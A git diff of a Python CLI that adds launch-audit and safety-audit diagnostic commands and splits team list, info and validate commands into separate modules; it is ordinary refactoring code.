if diagnostics.state == "empty": + console.print("State: empty") + console.print("The launch-audit file exists, but it has no records yet.") + return + + console.print("State: available") + console.print(f"Recent scan lines: {diagnostics.scanned_line_count}") + console.print(f"Malformed records in recent scan: {diagnostics.malformed_line_count}") + if diagnostics.last_malformed_line is not None: + console.print(f"Last malformed line in recent scan: {diagnostics.last_malformed_line}") + + console.print() + console.print("[bold]Last failure[/bold]") + if diagnostics.last_failure is None: + console.print("No failed launch event was found in the recent scan.") + else: + _render_launch_audit_event(diagnostics.last_failure) + + console.print() + console.print(f"[bold]Recent events[/bold] (limit {diagnostics.requested_limit})") + if len(diagnostics.recent_events) == 0: + console.print("No recent launch events matched the requested limit.") + return + + for event in diagnostics.recent_events: + _render_launch_audit_event(event) + console.print() + + +def _render_launch_audit_event(event: LaunchAuditEventRecord) -> None: + provider = event.provider_id or "unknown" + console.print( + f"- {event.occurred_at} [{event.severity}] {event.event_type} " + f"provider={provider} line={event.line_number}" + ) + console.print(f" {event.message}") + if event.failure_reason: + console.print(f" Failure reason: {event.failure_reason}") # ───────────────────────────────────────────────────────────────────────────── @@ -75,26 +135,18 @@ def support_bundle_cmd( - System information (platform, Python version) - CLI configuration (secrets redacted) - Doctor output (health check results) - - Diagnostic information + - Launch-audit diagnostics - The bundle is safe to share - all sensitive data is redacted. + The bundle is safe to share by default. """ - # --pretty implies --json if pretty: json_output = True set_pretty_mode(True) redact_paths_flag = not no_redact_paths - output_path = Path(output) if output else _get_default_bundle_path() - - # Build dependencies from adapters - adapters = get_default_adapters() - dependencies = SupportBundleDependencies( - filesystem=adapters.filesystem, - clock=adapters.clock, - doctor_runner=adapters.doctor_runner, - archive_writer=adapters.archive_writer, - ) + output_path = Path(output) if output else get_default_support_bundle_path() + + dependencies = build_default_support_bundle_dependencies() request = SupportBundleRequest( output_path=output_path, @@ -109,7 +161,6 @@ def support_bundle_cmd( print_json(envelope) raise typer.Exit(0) - # Create the bundle zip file console.print("[cyan]Generating support bundle...[/cyan]") create_support_bundle(request, dependencies=dependencies) @@ -120,3 +171,151 @@ def support_bundle_cmd( console.print("[dim]You can share this file safely with support.[/dim]") raise typer.Exit(0) + + +# ───────────────────────────────────────────────────────────────────────────── +# Launch Audit Command +# ───────────────────────────────────────────────────────────────────────────── + + +@support_app.command("launch-audit") +@handle_errors +def support_launch_audit_cmd( + limit: int = typer.Option( + 10, + "--limit", + min=0, + help="Maximum number of recent launch events to show.", + ), + json_output: bool = typer.Option( + False, + "--json", + help="Output diagnostics as JSON.", + ), + pretty: bool = typer.Option( + False, + "--pretty", + help="Pretty-print JSON output (implies --json).", + ), +) -> None: + """Show recent launch-audit diagnostics from SCC's durable JSONL sink.""" + if pretty: + json_output = True + set_pretty_mode(True) + + diagnostics = read_launch_audit_diagnostics( + audit_path=config.LAUNCH_AUDIT_FILE, + limit=limit, + redact_paths=True, + ) + + if json_output: + with json_output_mode(): + print_json(build_launch_audit_envelope(diagnostics)) + raise typer.Exit(0) + + _render_launch_audit_human(diagnostics) + raise typer.Exit(0) + + +# ───────────────────────────────────────────────────────────────────────────── +# Safety Audit Command +# ───────────────────────────────────────────────────────────────────────────── + + +def _render_safety_audit_human(diagnostics: SafetyAuditDiagnostics) -> None: + """Render safety-audit diagnostics for human readers.""" + console.print(f"[bold cyan]Safety audit[/bold cyan]\nSink: {diagnostics.sink_path}") + + if diagnostics.state == "unavailable": + console.print("State: unavailable") + if diagnostics.error: + console.print(f"Error: {diagnostics.error}") + else: + console.print("No audit file exists yet.") + return + + if diagnostics.state == "empty": + console.print("State: empty") + console.print("The audit file exists, but it has no safety-check records yet.") + return + + console.print("State: available") + console.print(f"Recent scan lines: {diagnostics.scanned_line_count}") + console.print(f"Malformed records in recent scan: {diagnostics.malformed_line_count}") + if diagnostics.last_malformed_line is not None: + console.print(f"Last malformed line in recent scan: {diagnostics.last_malformed_line}") + + console.print() + console.print(f"Blocked: {diagnostics.blocked_count} Allowed: {diagnostics.allowed_count}") + + console.print() + console.print("[bold]Last blocked[/bold]") + if diagnostics.last_blocked is None: + console.print("No blocked safety event was found in the recent scan.") + else: + _render_safety_audit_event(diagnostics.last_blocked) + + console.print() + console.print(f"[bold]Recent safety events[/bold] (limit {diagnostics.requested_limit})") + if len(diagnostics.recent_events) == 0: + console.print("No recent safety events matched the requested limit.") + return + + for event in diagnostics.recent_events: + _render_safety_audit_event(event) + console.print() + + +def _render_safety_audit_event(event: SafetyAuditEventRecord) -> None: + provider = event.provider_id or "unknown" + verdict = event.verdict_allowed or "unknown" + console.print( + f"- {event.occurred_at} [{event.severity}] {event.event_type} " + f"provider={provider} verdict={verdict} line={event.line_number}" + ) + console.print(f" {event.message}") + if event.command: + console.print(f" Command: {event.command}") + if event.matched_rule: + console.print(f" Rule: {event.matched_rule}") + + +@support_app.command("safety-audit") +@handle_errors +def support_safety_audit_cmd( + limit: int = typer.Option( + 10, + "--limit", + min=0, + help="Maximum number of recent safety events to show.", + ), + json_output: bool = typer.Option( + False, + "--json", + help="Output diagnostics as JSON.", + ), + pretty: bool = typer.Option( + False, + "--pretty", + help="Pretty-print JSON output (implies --json).", + ), +) -> None: + """Show recent safety-check diagnostics from SCC's durable JSONL sink.""" + if pretty: + json_output = True + set_pretty_mode(True) + + diagnostics = read_safety_audit_diagnostics( + audit_path=config.LAUNCH_AUDIT_FILE, + limit=limit, + redact_paths=True, + ) + + if json_output: + with json_output_mode(): + print_json(build_safety_audit_envelope(diagnostics)) + raise typer.Exit(0) + + _render_safety_audit_human(diagnostics) + raise typer.Exit(0) diff --git a/src/scc_cli/commands/team.py b/src/scc_cli/commands/team.py index c824d6a..bac0d25 100644 --- a/src/scc_cli/commands/team.py +++ b/src/scc_cli/commands/team.py @@ -1,5 +1,4 @@ -""" -Define team management commands for SCC CLI. +"""Define team management commands for SCC CLI. Provide structured team management: - scc team list - List available teams @@ -9,6 +8,11 @@ - scc team validate - Validate team configuration (plugins, security, cache) All commands support --json output with proper envelopes. + +team_list and team_info live in team_info.py; team_validate lives in +team_validate.py. This module keeps display helpers, federation helpers, +team_app definition, team_callback, team_switch, and team_current, and +re-exports public names for backward compatibility. """ import json @@ -16,25 +20,21 @@ from typing import Any import typer -from rich.panel import Panel -from rich.table import Table from .. import config, teams -from ..bootstrap import get_default_adapters -from ..cli_common import console, handle_errors, render_responsive_table +from ..cli_common import console, handle_errors from ..core.constants import CURRENT_SCHEMA_VERSION from ..json_command import json_command from ..kinds import Kind -from ..marketplace.compute import TeamNotFoundError -from ..marketplace.resolve import ConfigFetchError, EffectiveConfig, resolve_effective_config -from ..marketplace.schema import OrganizationConfig, normalize_org_config_data from ..marketplace.team_fetch import TeamFetchResult, fetch_team_config -from ..marketplace.trust import TrustViolationError from ..output_mode import is_json_mode, print_human -from ..panels import create_error_panel, create_success_panel, create_warning_panel +from ..panels import create_error_panel, create_success_panel from ..ui.gate import InteractivityContext from ..ui.picker import TeamSwitchRequested, pick_team from ..validate import validate_team_config +from .team_info import team_info as _team_info_fn +from .team_info import team_list as _team_list_fn +from .team_validate import team_validate as _team_validate_fn # ═══════════════════════════════════════════════════════════════════════════════ # Display Helpers @@ -42,24 +42,14 @@ def _format_plugins_for_display(plugins: list[str], max_display: int = 2) -> str: - """Format a list of plugins for table/summary display. - - Args: - plugins: List of plugin identifiers (e.g., ["plugin@marketplace", ...]) - max_display: Maximum number of plugins to show before truncating - - Returns: - Formatted string like "plugin1, plugin2 +3 more" or "-" if empty - """ + """Format a list of plugins for table/summary display.""" if not plugins: return "-" if len(plugins) <= max_display: - # Show all plugin names (without marketplace suffix for brevity) names = [p.split("@")[0] for p in plugins] return ", ".join(names) else: - # Show first N and count of remaining names = [p.split("@")[0] for p in plugins[:max_display]] remaining = len(plugins) - max_display return f"{', '.join(names)} +{remaining} more" @@ -150,15 +140,7 @@ def _validate_team_config_file(source: str, verbose: bool) -> dict[str, Any]: def _get_config_source_from_raw( org_config: dict[str, Any] | None, team_name: str ) -> dict[str, Any] | None: - """Extract config_source from raw org_config dict for a team. - - Args: - org_config: Raw org config dict (or None) - team_name: Team profile name - - Returns: - Raw config_source dict if team is federated, None if inline or not found - """ + """Extract config_source from raw org_config dict for a team.""" if org_config is None: return None @@ -174,20 +156,7 @@ def _get_config_source_from_raw( def _parse_config_source(raw_source: dict[str, Any]) -> Any: - """Parse config_source dict into ConfigSource model. - - The org config uses a discriminator field: - {"source": "github", "owner": "...", "repo": "..."} - - Args: - raw_source: Raw config_source dict from org config - - Returns: - Parsed ConfigSource model (ConfigSourceGitHub, ConfigSourceGit, or ConfigSourceURL) - - Raises: - ValueError: If config_source format is invalid - """ + """Parse config_source dict into ConfigSource model.""" from ..marketplace.schema import ( ConfigSourceGit, ConfigSourceGitHub, @@ -207,18 +176,7 @@ def _parse_config_source(raw_source: dict[str, Any]) -> Any: def _fetch_federated_team_config( org_config: dict[str, Any] | None, team_name: str ) -> TeamFetchResult | None: - """Fetch team config if team is federated, return None if inline. - - This eagerly fetches the team config to prime the cache when - switching to a federated team. - - Args: - org_config: Raw org config dict - team_name: Team name to fetch config for - - Returns: - TeamFetchResult if federated team, None if inline - """ + """Fetch team config if team is federated, return None if inline.""" raw_source = _get_config_source_from_raw(org_config, team_name) if raw_source is None: return None @@ -227,7 +185,6 @@ def _fetch_federated_team_config( config_source = _parse_config_source(raw_source) return fetch_team_config(config_source, team_name) except ValueError: - # Invalid config_source format - treat as inline return None @@ -252,131 +209,11 @@ def team_callback( json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON"), ) -> None: - """List teams by default. - - This makes `scc team` behave like `scc team list` for convenience. - """ + """List teams by default.""" if ctx.invoked_subcommand is None: team_list(verbose=verbose, sync=sync, json_output=json_output, pretty=pretty) -# ═══════════════════════════════════════════════════════════════════════════════ -# Team List Command -# ═══════════════════════════════════════════════════════════════════════════════ - - -@team_app.command("list") -@json_command(Kind.TEAM_LIST) -@handle_errors -def team_list( - verbose: bool = typer.Option(False, "--verbose", "-v", help="Show full descriptions"), - sync: bool = typer.Option(False, "--sync", "-s", help="Sync team configs from organization"), - json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), - pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), -) -> dict[str, Any]: - """List available team profiles. - - Returns a list of teams with their names, descriptions, and plugins. - Use --verbose to show full descriptions instead of truncated versions. - Use --sync to refresh the team list from the organization config. - """ - cfg = config.load_user_config() - org_config = config.load_cached_org_config() - - # Sync if requested - if sync: - from ..remote import fetch_org_config - - org_source = cfg.get("organization_source", {}) - org_url = org_source.get("url") - org_auth = org_source.get("auth") - if org_url: - adapters = get_default_adapters() - fetched_config, _etag, status_code = fetch_org_config( - org_url, - org_auth, - fetcher=adapters.remote_fetcher, - ) - if fetched_config and status_code == 200: - org_config = fetched_config - # Save to cache - config.CACHE_DIR.mkdir(parents=True, exist_ok=True) - import json - - cache_file = config.CACHE_DIR / "org_config.json" - cache_file.write_text(json.dumps(org_config, indent=2)) - print_human("[green]✓ Team list synced from organization[/green]") - - available_teams = teams.list_teams(org_config) - - current = cfg.get("selected_profile") - - team_data = [] - for team in available_teams: - team_data.append( - { - "name": team["name"], - "description": team.get("description", ""), - "plugins": team.get("plugins", []), - "is_current": team["name"] == current, - } - ) - - if not is_json_mode(): - if not available_teams: - # Provide context-aware messaging based on mode - if config.is_standalone_mode(): - console.print( - create_warning_panel( - "Standalone Mode", - "Teams are not available in standalone mode.", - "Run 'scc setup' with an organization URL to enable teams", - ) - ) - else: - console.print( - create_warning_panel( - "No Teams", - "No team profiles defined in organization config.", - "Contact your organization admin to configure teams", - ) - ) - return {"teams": [], "current": current} - - rows = [] - for team in available_teams: - name = team["name"] - if name == current: - name = f"[bold]{name}[/bold] ←" - - desc = team.get("description", "") - if not verbose and len(desc) > 40: - desc = desc[:37] + "..." - - plugins = team.get("plugins", []) - plugins_display = _format_plugins_for_display(plugins) - rows.append([name, desc, plugins_display]) - - render_responsive_table( - title="Available Team Profiles", - columns=[ - ("Team", "cyan"), - ("Description", "white"), - ], - rows=rows, - wide_columns=[ - ("Plugins", "yellow"), - ], - ) - - console.print() - console.print( - "[dim]Use: scc team switch to switch, scc team info for details[/dim]" - ) - - return {"teams": team_data, "current": current} - - # ═══════════════════════════════════════════════════════════════════════════════ # Team Current Command # ═══════════════════════════════════════════════════════════════════════════════ @@ -389,11 +226,7 @@ def team_current( json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), ) -> dict[str, Any]: - """Show the currently selected team profile. - - Displays the current team and basic information about it. - Returns null for team if no team is selected. - """ + """Show the currently selected team profile.""" cfg = config.load_user_config() org_config = config.load_cached_org_config() @@ -451,18 +284,13 @@ def team_switch( json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), ) -> dict[str, Any]: - """Switch to a different team profile. - - If team_name is not provided, shows an interactive picker (if TTY). - Use --non-interactive to fail instead of showing picker. - """ + """Switch to a different team profile.""" cfg = config.load_user_config() org_config = config.load_cached_org_config() available_teams = teams.list_teams(org_config) if not available_teams: - # Provide context-aware messaging based on mode if config.is_standalone_mode(): print_human( "[yellow]Teams are not available in standalone mode.[/yellow]\n" @@ -480,18 +308,15 @@ def team_switch( resolved_name: str | None = team_name if resolved_name is None: - # Create interactivity context from flags ctx = InteractivityContext.create( json_mode=is_json_mode(), no_interactive=non_interactive, ) if ctx.allows_prompt(): - # Show interactive picker try: selected_team = pick_team(available_teams, current_team=current) if selected_team is None: - # User cancelled - exit cleanly return { "success": False, "cancelled": True, @@ -500,10 +325,8 @@ def team_switch( } resolved_name = selected_team["name"] except TeamSwitchRequested: - # Already in team picker - treat as cancel return {"success": False, "cancelled": True, "previous": current, "current": None} else: - # Non-interactive mode with no team specified raise typer.BadParameter( "Team name required in non-interactive mode. " f"Available: {', '.join(t['name'] for t in available_teams)}" @@ -517,7 +340,7 @@ def team_switch( "current": None, } - # Validate team exists (when name provided directly as arg) + # Validate team exists team_names = [t["name"] for t in available_teams] if resolved_name not in team_names: print_human( @@ -526,7 +349,6 @@ def team_switch( ) return {"success": False, "error": "team_not_found", "team": resolved_name} - # Get previous team previous = cfg.get("selected_profile") # Switch team @@ -580,457 +402,19 @@ def team_switch( # ═══════════════════════════════════════════════════════════════════════════════ -# Team Info Command +# Register extracted commands on team_app # ═══════════════════════════════════════════════════════════════════════════════ +# Wrap with decorators and register +_team_list_cmd = team_app.command("list")( + json_command(Kind.TEAM_LIST)(handle_errors(_team_list_fn)) +) +_team_info_cmd = team_app.command("info")( + json_command(Kind.TEAM_INFO)(handle_errors(_team_info_fn)) +) +_team_validate_cmd = team_app.command("validate")( + json_command(Kind.TEAM_VALIDATE)(handle_errors(_team_validate_fn)) +) -@team_app.command("info") -@json_command(Kind.TEAM_INFO) -@handle_errors -def team_info( - team_name: str = typer.Argument(..., help="Team name to show details for"), - json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), - pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), -) -> dict[str, Any]: - """Show detailed information for a specific team profile. - - Displays team description, plugin configuration, marketplace info, - federation status (federated vs inline), config source, and trust grants. - """ - org_config = config.load_cached_org_config() - - details = teams.get_team_details(team_name, org_config) - - # Detect if team is federated (has config_source) - raw_source = _get_config_source_from_raw(org_config, team_name) - is_federated = raw_source is not None - - # Get config source description for federated teams - config_source_display: str | None = None - if is_federated and raw_source is not None: - source_type = raw_source.get("source") - if source_type == "github": - config_source_display = ( - f"github.com/{raw_source.get('owner', '?')}/{raw_source.get('repo', '?')}" - ) - elif source_type == "git": - url = raw_source.get("url", "") - # Normalize for display - if url.startswith("https://"): - url = url[8:] - elif url.startswith("git@"): - url = url[4:].replace(":", "/", 1) - if url.endswith(".git"): - url = url[:-4] - config_source_display = url - elif source_type == "url": - url = raw_source.get("url", "") - if url.startswith("https://"): - url = url[8:] - config_source_display = url - - # Get trust grants for federated teams - trust_grants: dict[str, Any] | None = None - if is_federated and org_config: - profiles = org_config.get("profiles", {}) - profile = profiles.get(team_name, {}) - if isinstance(profile, dict): - trust_grants = profile.get("trust") - - if not details: - if not is_json_mode(): - console.print( - create_warning_panel( - "Team Not Found", - f"No team profile named '{team_name}'.", - "Run 'scc team list' to see available profiles", - ) - ) - return {"team": team_name, "found": False, "profile": None} - - # Get validation info - validation = teams.validate_team_profile(team_name, org_config) - - # Human output - if not is_json_mode(): - grid = Table.grid(padding=(0, 2)) - grid.add_column(style="dim", no_wrap=True) - grid.add_column(style="white") - - grid.add_row("Description:", details.get("description", "-")) - - # Show federation mode - if is_federated: - grid.add_row("Mode:", "[cyan]federated[/cyan]") - if config_source_display: - grid.add_row("Config Source:", config_source_display) - else: - grid.add_row("Mode:", "[dim]inline[/dim]") - - plugins = details.get("plugins", []) - if plugins: - # Show all plugins with full identifiers - plugins_display = ", ".join(plugins) - grid.add_row("Plugins:", plugins_display) - if details.get("marketplace_repo"): - grid.add_row("Marketplace:", details.get("marketplace_repo", "-")) - else: - grid.add_row("Plugins:", "[dim]None (base profile)[/dim]") - - # Show trust grants for federated teams - if trust_grants: - grid.add_row("", "") - grid.add_row("[bold]Trust Grants:[/bold]", "") - inherit = trust_grants.get("inherit_org_marketplaces", True) - allow_add = trust_grants.get("allow_additional_marketplaces", False) - grid.add_row( - " Inherit Org Marketplaces:", "[green]yes[/green]" if inherit else "[red]no[/red]" - ) - grid.add_row( - " Allow Additional Marketplaces:", - "[green]yes[/green]" if allow_add else "[red]no[/red]", - ) - - # Show validation warnings - if validation.get("warnings"): - grid.add_row("", "") - for warning in validation["warnings"]: - grid.add_row("[yellow]Warning:[/yellow]", warning) - - panel = Panel( - grid, - title=f"[bold cyan]Team: {team_name}[/bold cyan]", - border_style="cyan", - padding=(1, 2), - ) - - console.print() - console.print(panel) - console.print() - console.print(f"[dim]Use: scc start -t {team_name} to use this profile[/dim]") - - # Build response with federation metadata - response: dict[str, Any] = { - "team": team_name, - "found": True, - "is_federated": is_federated, - "profile": { - "name": details.get("name"), - "description": details.get("description"), - "plugins": details.get("plugins", []), - "marketplace": details.get("marketplace"), - "marketplace_type": details.get("marketplace_type"), - "marketplace_repo": details.get("marketplace_repo"), - }, - "validation": { - "valid": validation.get("valid", True), - "warnings": validation.get("warnings", []), - "errors": validation.get("errors", []), - }, - } - - # Add federation details for federated teams - if is_federated: - response["config_source"] = config_source_display - if trust_grants: - response["trust"] = trust_grants - - return response - - -@team_app.command("validate") -@json_command(Kind.TEAM_VALIDATE) -@handle_errors -def team_validate( - team_name: str | None = typer.Argument( - None, help="Team name to validate (defaults to current)" - ), - file: str | None = typer.Option( - None, "--file", "-f", help="Path to a team config file to validate" - ), - verbose: bool = typer.Option(False, "--verbose", "-v", help="Show detailed output"), - json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), - pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), -) -> dict[str, Any]: - """Validate team configuration and show effective plugins. - - Resolves the team configuration (inline or federated) and validates: - - Plugin security compliance (blocked_plugins patterns) - - Plugin allowlists (allowed_plugins patterns) - - Marketplace trust grants (for federated teams) - - Cache freshness status (for federated teams) - - Use --file to validate a local team config file against the schema. - Use --verbose to see detailed validation information. - """ - if file and team_name: - if not is_json_mode(): - console.print( - create_warning_panel( - "Conflicting Inputs", - "Use either TEAM_NAME or --file, not both.", - "Examples: scc team validate backend | scc team validate --file team.json", - ) - ) - return { - "mode": "team", - "team": team_name, - "valid": False, - "error": "Conflicting inputs: provide TEAM_NAME or --file, not both", - } - - # File validation mode (explicit or detected) - if file or (team_name and _looks_like_path(team_name)): - source = file or team_name or "" - return _validate_team_config_file(source, verbose) - - # Default to current team if omitted - if not team_name: - cfg = config.load_user_config() - team_name = cfg.get("selected_profile") - if not team_name: - if not is_json_mode(): - console.print( - create_warning_panel( - "No Team Selected", - "No team provided and no current team is selected.", - "Run 'scc team list' or 'scc team switch ' to select one.", - ) - ) - return { - "mode": "team", - "team": None, - "valid": False, - "error": "No team selected", - } - - org_config_data = config.load_cached_org_config() - if not org_config_data: - if not is_json_mode(): - console.print( - create_warning_panel( - "No Org Config", - "No organization configuration found.", - "Run 'scc setup' to configure your organization", - ) - ) - return { - "mode": "team", - "team": team_name, - "valid": False, - "error": "No organization configuration found", - } - - # Parse org config (validated by JSON Schema when cached) - try: - org_config = OrganizationConfig.model_validate(normalize_org_config_data(org_config_data)) - except Exception as e: - if not is_json_mode(): - console.print( - create_warning_panel( - "Invalid Org Config", - f"Organization configuration is invalid: {e}", - "Run 'scc org update' to refresh your configuration", - ) - ) - return { - "mode": "team", - "team": team_name, - "valid": False, - "error": f"Invalid org config: {e}", - } - - # Resolve effective config (validates team exists, trust, security) - try: - effective = resolve_effective_config(org_config, team_name) - except TeamNotFoundError as e: - if not is_json_mode(): - console.print( - create_warning_panel( - "Team Not Found", - f"Team '{team_name}' not found in org config.", - f"Available teams: {', '.join(e.available_teams[:5])}", - ) - ) - return { - "mode": "team", - "team": team_name, - "valid": False, - "error": f"Team not found: {team_name}", - "available_teams": e.available_teams, - } - except TrustViolationError as e: - if not is_json_mode(): - console.print( - create_warning_panel( - "Trust Violation", - f"Team configuration violates trust policy: {e.violation}", - "Check team config_source and trust grants in org config", - ) - ) - return { - "mode": "team", - "team": team_name, - "valid": False, - "error": f"Trust violation: {e.violation}", - "team_name": e.team_name, - } - except ConfigFetchError as e: - if not is_json_mode(): - console.print( - create_warning_panel( - "Config Fetch Failed", - f"Failed to fetch config for team '{e.team_id}' from {e.source_type}", - str(e), # Includes remediation hint - ) - ) - return { - "mode": "team", - "team": team_name, - "valid": False, - "error": str(e), - "source_type": e.source_type, - "source_url": e.source_url, - } - - # Determine overall validity - is_valid = not effective.has_security_violations - - # Human output - if not is_json_mode(): - _render_validation_result(effective, verbose) - - # Build JSON response - response: dict[str, Any] = { - "mode": "team", - "team": team_name, - "valid": is_valid, - "is_federated": effective.is_federated, - "enabled_plugins_count": effective.plugin_count, - "blocked_plugins_count": len(effective.blocked_plugins), - "disabled_plugins_count": len(effective.disabled_plugins), - "not_allowed_plugins_count": len(effective.not_allowed_plugins), - } - - # Add federation metadata - if effective.is_federated: - response["config_source"] = effective.source_description - if effective.config_commit_sha: - response["config_commit_sha"] = effective.config_commit_sha - if effective.config_etag: - response["config_etag"] = effective.config_etag - - # Add cache status - if effective.used_cached_config: - response["used_cached_config"] = True - response["cache_is_stale"] = effective.cache_is_stale - if effective.staleness_warning: - response["staleness_warning"] = effective.staleness_warning - - # Add verbose details - if verbose or json_output or pretty: - response["enabled_plugins"] = sorted(effective.enabled_plugins) - response["blocked_plugins"] = [ - {"plugin_id": bp.plugin_id, "reason": bp.reason, "pattern": bp.pattern} - for bp in effective.blocked_plugins - ] - response["disabled_plugins"] = effective.disabled_plugins - response["not_allowed_plugins"] = effective.not_allowed_plugins - response["extra_marketplaces"] = effective.extra_marketplaces - - return response - - -def _render_validation_result(effective: EffectiveConfig, verbose: bool) -> None: - """Render validation result to terminal. - - Args: - effective: Resolved effective configuration - verbose: Whether to show detailed output - """ - console.print() - - # Header with validation status - if effective.has_security_violations: - status = "[red]FAILED[/red]" - border_style = "red" - else: - status = "[green]PASSED[/green]" - border_style = "green" - - grid = Table.grid(padding=(0, 2)) - grid.add_column(style="dim", no_wrap=True) - grid.add_column() - - # Basic info - grid.add_row("Status:", status) - grid.add_row( - "Mode:", "[cyan]federated[/cyan]" if effective.is_federated else "[dim]inline[/dim]" - ) - - if effective.is_federated: - grid.add_row("Config Source:", effective.source_description) - if effective.config_commit_sha: - grid.add_row("Commit SHA:", effective.config_commit_sha[:8]) - - # Cache status - if effective.used_cached_config: - cache_status = ( - "[yellow]stale[/yellow]" if effective.cache_is_stale else "[green]fresh[/green]" - ) - grid.add_row("Cache:", cache_status) - if effective.staleness_warning: - grid.add_row("", f"[dim]{effective.staleness_warning}[/dim]") - - grid.add_row("", "") - - # Plugin summary - grid.add_row("Enabled Plugins:", f"[green]{effective.plugin_count}[/green]") - if effective.blocked_plugins: - grid.add_row("Blocked Plugins:", f"[red]{len(effective.blocked_plugins)}[/red]") - if effective.disabled_plugins: - grid.add_row("Disabled Plugins:", f"[yellow]{len(effective.disabled_plugins)}[/yellow]") - if effective.not_allowed_plugins: - grid.add_row("Not Allowed:", f"[yellow]{len(effective.not_allowed_plugins)}[/yellow]") - - # Verbose details - if verbose: - grid.add_row("", "") - if effective.enabled_plugins: - grid.add_row("[bold]Enabled:[/bold]", "") - for plugin in sorted(effective.enabled_plugins): - grid.add_row("", f" [green]✓[/green] {plugin}") - - if effective.blocked_plugins: - grid.add_row("[bold]Blocked:[/bold]", "") - for bp in effective.blocked_plugins: - grid.add_row("", f" [red]✗[/red] {bp.plugin_id}") - grid.add_row("", f" [dim]Reason: {bp.reason}[/dim]") - grid.add_row("", f" [dim]Pattern: {bp.pattern}[/dim]") - - if effective.disabled_plugins: - grid.add_row("[bold]Disabled:[/bold]", "") - for plugin in effective.disabled_plugins: - grid.add_row("", f" [yellow]○[/yellow] {plugin}") - - if effective.not_allowed_plugins: - grid.add_row("[bold]Not Allowed:[/bold]", "") - for plugin in effective.not_allowed_plugins: - grid.add_row("", f" [yellow]○[/yellow] {plugin}") - - panel = Panel( - grid, - title=f"[bold cyan]Team Validation: {effective.team_id}[/bold cyan]", - border_style=border_style, - padding=(1, 2), - ) - console.print(panel) - - # Hint - if not verbose and ( - effective.blocked_plugins or effective.disabled_plugins or effective.not_allowed_plugins - ): - console.print() - console.print("[dim]Use --verbose for detailed plugin information[/dim]") - - console.print() +# Keep a module-level reference for team_callback's delegation +team_list = _team_list_fn diff --git a/src/scc_cli/commands/team_info.py b/src/scc_cli/commands/team_info.py new file mode 100644 index 0000000..09a191a --- /dev/null +++ b/src/scc_cli/commands/team_info.py @@ -0,0 +1,284 @@ +"""Team info and list commands. + +Extracted from team.py to reduce module size. Contains: +- team_info: shows detailed team profile information +- team_list: lists available team profiles + +These are plain functions, registered on team_app by team.py. +""" + +from __future__ import annotations + +from typing import Any + +import typer +from rich.panel import Panel +from rich.table import Table + +from .. import config, teams +from ..bootstrap import get_default_adapters +from ..cli_common import console, render_responsive_table +from ..output_mode import is_json_mode, print_human +from ..panels import create_warning_panel + + +def team_list( + verbose: bool = typer.Option(False, "--verbose", "-v", help="Show full descriptions"), + sync: bool = typer.Option(False, "--sync", "-s", help="Sync team configs from organization"), + json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), + pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), +) -> dict[str, Any]: + """List available team profiles. + + Returns a list of teams with their names, descriptions, and plugins. + Use --verbose to show full descriptions instead of truncated versions. + Use --sync to refresh the team list from the organization config. + """ + from .team import _format_plugins_for_display + + cfg = config.load_user_config() + org_config = config.load_cached_org_config() + + # Sync if requested + if sync: + from ..remote import fetch_org_config + + org_source = cfg.get("organization_source", {}) + org_url = org_source.get("url") + org_auth = org_source.get("auth") + if org_url: + adapters = get_default_adapters() + fetched_config, _etag, status_code = fetch_org_config( + org_url, + org_auth, + fetcher=adapters.remote_fetcher, + ) + if fetched_config and status_code == 200: + org_config = fetched_config + # Save to cache + config.CACHE_DIR.mkdir(parents=True, exist_ok=True) + import json + + cache_file = config.CACHE_DIR / "org_config.json" + cache_file.write_text(json.dumps(org_config, indent=2)) + print_human("[green]✓ Team list synced from organization[/green]") + + available_teams = teams.list_teams(org_config) + + current = cfg.get("selected_profile") + + team_data = [] + for team in available_teams: + team_data.append( + { + "name": team["name"], + "description": team.get("description", ""), + "plugins": team.get("plugins", []), + "is_current": team["name"] == current, + } + ) + + if not is_json_mode(): + if not available_teams: + if config.is_standalone_mode(): + console.print( + create_warning_panel( + "Standalone Mode", + "Teams are not available in standalone mode.", + "Run 'scc setup' with an organization URL to enable teams", + ) + ) + else: + console.print( + create_warning_panel( + "No Teams", + "No team profiles defined in organization config.", + "Contact your organization admin to configure teams", + ) + ) + return {"teams": [], "current": current} + + rows = [] + for team in available_teams: + name = team["name"] + if name == current: + name = f"[bold]{name}[/bold] ←" + + desc = team.get("description", "") + if not verbose and len(desc) > 40: + desc = desc[:37] + "..." + + plugins = team.get("plugins", []) + plugins_display = _format_plugins_for_display(plugins) + rows.append([name, desc, plugins_display]) + + render_responsive_table( + title="Available Team Profiles", + columns=[ + ("Team", "cyan"), + ("Description", "white"), + ], + rows=rows, + wide_columns=[ + ("Plugins", "yellow"), + ], + ) + + console.print() + console.print( + "[dim]Use: scc team switch to switch, scc team info for details[/dim]" + ) + + return {"teams": team_data, "current": current} + + +def team_info( + team_name: str = typer.Argument(..., help="Team name to show details for"), + json_output: bool = typer.Option(False, "--json", help="Output as JSON envelope"), + pretty: bool = typer.Option(False, "--pretty", help="Pretty-print JSON (implies --json)"), +) -> dict[str, Any]: + """Show detailed information for a specific team profile. + + Displays team description, plugin configuration, marketplace info, + federation status (federated vs inline), config source, and trust grants. + """ + from .team import _get_config_source_from_raw + + org_config = config.load_cached_org_config() + + details = teams.get_team_details(team_name, org_config) + + # Detect if team is federated (has config_source) + raw_source = _get_config_source_from_raw(org_config, team_name) + is_federated = raw_source is not None + + # Get config source description for federated teams + config_source_display: str | None = None + if is_federated and raw_source is not None: + source_type = raw_source.get("source") + if source_type == "github": + config_source_display = ( + f"github.com/{raw_source.get('owner', '?')}/{raw_source.get('repo', '?')}" + ) + elif source_type == "git": + url = raw_source.get("url", "") + if url.startswith("https://"): + url = url[8:] + elif url.startswith("git@"): + url = url[4:].replace(":", "/", 